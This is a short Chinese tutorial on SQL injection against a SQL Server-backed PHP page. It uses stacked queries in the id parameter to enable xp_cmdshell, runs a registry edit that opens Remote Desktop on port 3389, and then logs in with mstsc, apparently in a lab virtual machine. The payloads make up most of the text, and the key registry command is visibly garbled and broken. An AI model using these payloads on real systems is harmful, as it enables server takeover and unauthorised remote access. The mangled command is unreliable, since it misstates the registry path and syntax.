SQL注入篇——利用SqlServer执行系统命令连接远程桌面

我们用到的函数是xp_cmdshell 利用此存储过程可以直接执行系统命令。

一、确立连接

输入IP+/1.php?id=1出现如下界面说明连接成功

二、使用master表开启xp_cmdshell服务

输入下列语句开启服务：

?id=1;
use master;
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

关闭服务：

?id=1;
use master;
-- EXEC sp_configure 'show advanced options', 0;   //关完xp把这个注释解开,再执行
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;  //先关闭这里把1改成0，执行
RECONFIGURE;

开启3389端口，连接远程桌面

id=1;
use master;
Exec master..xp_cmdshell "REG ADD HKLMISYSTEMCurrentControlSetlControNTerminal" "Server Iv fDenyTSConnections /t REG_ DWORD /d 0 /f"

在虚拟机终端输入netstat -ano查看端口,看到3389执行成功

键盘Win+R打开命令行窗口、输入mstsc打开远程桌面
输入目标IP连接

点击更多选项使用其他账户

输入目标机的登录用户名和密码即可

成功。